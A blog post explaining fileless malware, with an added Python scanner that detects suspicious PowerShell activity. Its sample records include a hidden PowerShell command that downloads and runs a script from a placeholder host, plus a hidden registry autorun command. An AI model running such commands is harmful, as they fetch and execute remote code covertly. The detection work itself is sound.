Fileless Malware: They Exist and Are More Dangerous

A shortened term for malicious software, malware generally refers to a wide variety of harmful, intrusive, or hostile software. The term includes worms, viruses, ransomware, adware, spyware, Trojan horses, scareware, and other ill-intentioned software. Generally, this malicious software is spread through files: software, after all, entails the presence of some file to serve as the installer, the executable itself, or an infected file that carries the malicious code. However, there is so-called fileless malware, which does not operate the way typical malware does, and it poses a significant threat.

What Is Fileless Malware?

As the name implies, fileless malware is malicious software that does not require a file on disk to infect a system and spread. Instead, the malicious code lives in the computer's RAM or in its registry. It is considered an advanced volatile threat (AVT), spread through PowerShell or carefully crafted scripts that infect a host. This lets fileless malware infect a vulnerable system without writing files to the local hard drive. It only needs to gain administrative rights on the system, which can be obtained by exploiting a vulnerability or through other attacks that lead to privilege escalation.

How It Works

The fileless malware attacks found so far generally operate through administrative and security testing tools (for example PowerShell, Mimikatz, and Metasploit). As mentioned earlier, they need to gain the necessary admin rights on a device before they can execute a hidden command. The exact process or mechanism varies with the goal the malware was designed for. In some cases the attack may still use a file, for example a .doc email attachment, to deliver the code into the device's memory.

The window of time an attack is expected to last is difficult to ascertain, or broadly unknown, since the malware does not depend on endpoints to sustain connectivity. An attack can be immediately terminated if the device is rebooted or restarted. Still, cybercriminals may implement a backup plan for reboots by planting registry entries to support ongoing attacks; these registry entries can initiate scripts even after a device has been rebooted.

Fileless malware uses the affected system's own commands to carry out an attack. Examples of system commands likely to be used are those for establishing a network connection, configuring a proxy IP address, and assigning static IP addresses. These commands can be invoked without the intention or permission of the device's owner and used to further the attack.
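Because the activity described above (PowerShell invoked with hidden windows and encoded commands, and registry autorun entries that re-launch scripts after a reboot) leaves little on disk, defenders look at process creation logs and autorun registry values instead. The following is an added illustration written for this post, not code from the author or from any vendor mentioned here: a small Python scanner that takes command lines collected from those two sources, decodes any `-EncodedCommand` payload (base64 over UTF-16LE, which is how PowerShell expects it), and reports which indicators it matched. The indicator list and the sample records are constructed for the example and are not a complete detection rule set.

```python
import base64
import re

# Indicator patterns for PowerShell invocations typical of fileless activity.
# Assumed, illustrative list: real detection content would be broader and tuned.
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "exec_policy_bypass": re.compile(r"-e(?:p|x|xecutionpolicy)\s+bypass", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
}
# -EncodedCommand and its short aliases, followed by a base64 blob
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None.

    PowerShell expects the blob to be base64 over UTF-16LE text, so that is
    how it is decoded here; malformed blobs are treated as 'not encoded'.
    """
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(source, cmdline):
    """Score one command line (from a process log or a registry autorun value)."""
    decoded = decode_encoded_command(cmdline)
    # Match patterns against the visible command line plus the decoded payload,
    # so indicators hidden behind base64 are still seen.
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    if decoded is not None:
        hits.insert(0, "encoded_command")
    return {"source": source, "indicators": hits, "decoded": decoded}


def scan(records):
    """Return findings for every record that has at least one indicator."""
    return [f for f in (analyse(src, cmd) for src, cmd in records) if f["indicators"]]


def _encode_for_powershell(script):
    # Helper used only to build the constructed sample below.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample records: (where it was collected, command line).
# example.invalid is a reserved name; HKCU:\Software\ConstructedKey is made up.
SAMPLE_RECORDS = [
    ("process_creation",
     "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
     + _encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')")),
    ("registry_run_key",
     r'powershell.exe -nop -w hidden -ep bypass -c "IEX (Get-ItemProperty HKCU:\Software\ConstructedKey).Payload"'),
    ("process_creation",
     r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\nightly-backup.ps1"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding["source"], finding["indicators"])
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

The third record, a signed script run by an administrator, produces no indicators, which is the point of matching on combinations such as a hidden window plus an encoded or downloaded payload rather than on the presence of PowerShell alone. On a real host the records would come from process creation auditing (or PowerShell script block logging) and from enumerating the Run keys, and any match would be a trigger for investigation, not an automatic verdict.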

Since most anti-malware software may not yet be able to properly detect fileless malware, it is very important to educate computer users on how to avoid the problem. Suspicious sites and web apps should be avoided. Ads in popup or modal windows should be properly closed. Email attachments should be dealt with carefully. In workplaces where employees have difficulty understanding their computer interfaces, business software, or websites, it may be necessary to use localization services to make sure nobody falls prey to deceitful schemes. Everything on their computers should be clearly translated or localized so that they do not double-click camouflaged executable files or unwittingly use malicious web apps.

Prevalence and Threat

Fortunately, fileless malware is not yet that prevalent. Instances of fileless malware attacks are still few compared to the number of other malware attacks. It is important to emphasize, though, that the threat they pose is significantly higher. They are also being used increasingly, especially against financial institutions. Because of their stealthy action and minimal footprint, many cybercriminals are expected to turn to them.

As posited in this post's title, fileless malware can be more dangerous mainly because it is difficult to detect. Because it does not work the way other malware does, few antivirus or anti-malware systems detect it. Because of this non-detection, antivirus vendors also fail to create a corresponding signature definition. As such, even if the malware has already been detected elsewhere, the information about it cannot easily be shared with others, so stopping further infection becomes difficult.

Also adding to the threat of stealthiness is the flexibility of fileless malware. It can be strung together with other cyber attacks to enable multiple payload delivery. Security experts say they have already identified instances where fileless malware was paired with cryptographic modules for use in ransomware.

Recent Attacks

Just recently, it was discovered that fileless malware had been targeting restaurants in the United States. Notably, most antivirus or anti-malware programs failed to detect these attacks. The use of fileless malware attacks was believed to be mainly attributable to state-sponsored or government spies. Recently, though, cybercriminals have been found harnessing the fileless strategy. One established hacking group, FIN7, for example, is reportedly making use of this attack, according to a blog post by the security specialist Morphisec.

Addressing the Threat

For now, not much can be said to warn everyone about fileless malware infections except the usual need to be careful about clicking anything whose origin you cannot be sure of. Security firms are still working on a way to address the fileless malware problem. The best that can be done is to be more careful in dealing with files and web apps. It is also important to always update system software, and it may help to shut down computers when not in use or restart them occasionally.

Author bio:

Bernadine Racoma is a senior content writer at Day Translations, a human translation services company. She has notable fondness for things related to technology, travel, lifestyle, and current affairs. She is also an advocate and mother to 7 successful children.

